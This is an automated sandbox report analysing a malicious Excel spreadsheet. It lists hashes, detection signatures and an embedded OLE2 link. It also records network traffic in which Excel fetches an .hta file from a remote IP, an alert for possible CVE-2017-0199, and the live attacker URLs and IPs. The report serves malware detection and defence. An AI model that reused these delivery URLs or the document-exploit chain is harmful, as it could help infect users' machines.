Windows Analysis Report
SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx

Overview

General Information

Sample name: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
Analysis ID: 1541459
MD5: 3d36155c4af65b9dd19c7da9ed0461dd
SHA1: 5ba7e33fbc5c6d208daaf5665176defb13aa1c65
SHA256: 1078b2b307b35167121d518c004f8403f4d52bdb41c9f399fa141bf3a6f3c4ae
Tags: xlsx
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx ReversingLabs: Detection: 45%
Machine Learning detection for sample
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: u4u.kids
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 24.199.88.84 24.199.88.84
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.175.113.214:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.214
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51302D8.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: u4u.kids
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:19:25 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 107.175.113.214 Port 80</address></body></html>
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx, EC130000.0.dr String found in binary or memory: https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famo
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary
barindex
Excel sheet contains many unusual embedded objects
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx OLE: Microsoft Excel 2007+
Source: EC130000.0.dr OLE: Microsoft Excel 2007+
Document contains embedded VBA macros
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx OLE indicator, VBA macros: true
Document embeds suspicious OLE2 link
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Stream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W
Source: EC130000.0.dr Stream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W
Source: classification engine Classification label: mal56.winXLSX@1/7@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8AE0.tmp Jump to behavior
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx OLE indicator, Workbook stream: true
Source: EC130000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx ReversingLabs: Detection: 45%
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: EC130000.0.dr Initial sample: OLE indicators vbamacros = False
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Stream path 'Workbook' entropy: 7.9744732217 (max. 8.0)
Source: EC130000.0.dr Stream path 'Workbook' entropy: 7.97390903279 (max. 8.0)
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1541459 Sample: SecuriteInfo.com.Other.Malw... Startdate: 24/10/2024 Architecture: WINDOWS Score: 56 15 Multi AV Scanner detection for submitted file 2->15 17 Excel sheet contains many unusual embedded objects 2->17 19 Machine Learning detection for sample 2->19 5 EXCEL.EXE 31 24 2->5         started        process3 dnsIp4 11 u4u.kids 24.199.88.84, 443, 49161 TWC-12271-NYCUS United States 5->11 13 107.175.113.214, 49162, 80 AS-COLOCROSSINGUS United States 5->13 9 ~$SecuriteInfo.com...en.26961.24680.xlsx, data 5->9 dropped file5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
24.199.88.84
 u4u.kids United States
12271 TWC-12271-NYCUS false
107.175.113.214
 unknown United States
36352 AS-COLOCROSSINGUS false

Contacted Domains

Name IP Active
u4u.kids 24.199.88.84 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer false
    		unknown
    http://107.175.113.214/xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta false
      		unknown